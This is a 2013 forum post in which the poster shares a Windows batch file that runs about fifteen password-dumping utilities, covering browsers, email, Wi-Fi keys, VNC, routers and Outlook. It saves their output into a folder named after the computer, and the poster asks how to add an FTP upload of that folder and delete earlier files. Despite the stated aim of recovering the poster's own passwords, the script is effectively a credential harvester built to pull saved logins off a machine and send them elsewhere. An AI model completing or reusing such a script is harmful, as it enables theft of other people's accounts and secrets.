coding a batch file.
Posted: 02 Sep 2013 20:14
Hi im coding a batch file to recover my lost passwords.
i need to be able to have this batch file upload a subfolder to ftp and delete all previous files/folders .
any ideas would be greatly appreciated.
Code:
i need to be able to have this batch file upload a subfolder to ftp and delete all previous files/folders .
any ideas would be greatly appreciated.
Code:
Code: Select all
@echo off
cls
ping 127.0.0.1 -n 1 -w 5000 > nul
7z e archive.rar
mkdir %computername%
mspass.exe /shtml %computername%\mspass.html
iepv.exe /shtml %computername%\mspass.html
mailpv.exe /shtml %computername%\mailpv.html
ChromePass.exe /shtml %computername%\ChromePass.html
PstPassword.exe /shtml %computername%\PstPassword.html
VncPassView.exe /shtml %computername%\VncPassView.html
WirelessKeyView.exe /shtml %computername%\WirelesskeyView.html
netpass.exe /shtml %computername%\netpass.html
WebBrowserPassview.exe /shtml %computername%\WebBrowserPassview.html
Dialupass.exe /shtml %computername%\Dialuppass.html
pspv.exe /shtml %computername%\pspv.html
OperaPassView.exe /shtml %computername%\OperaPassView.html
RouterPassView.exe /shtml %computername%\RouterPassView.html
PasswordFox.exe /shtml %computername%\PasswordFox.html
BulletsPassView.exe /shtml %computername%\BulletsPassView.html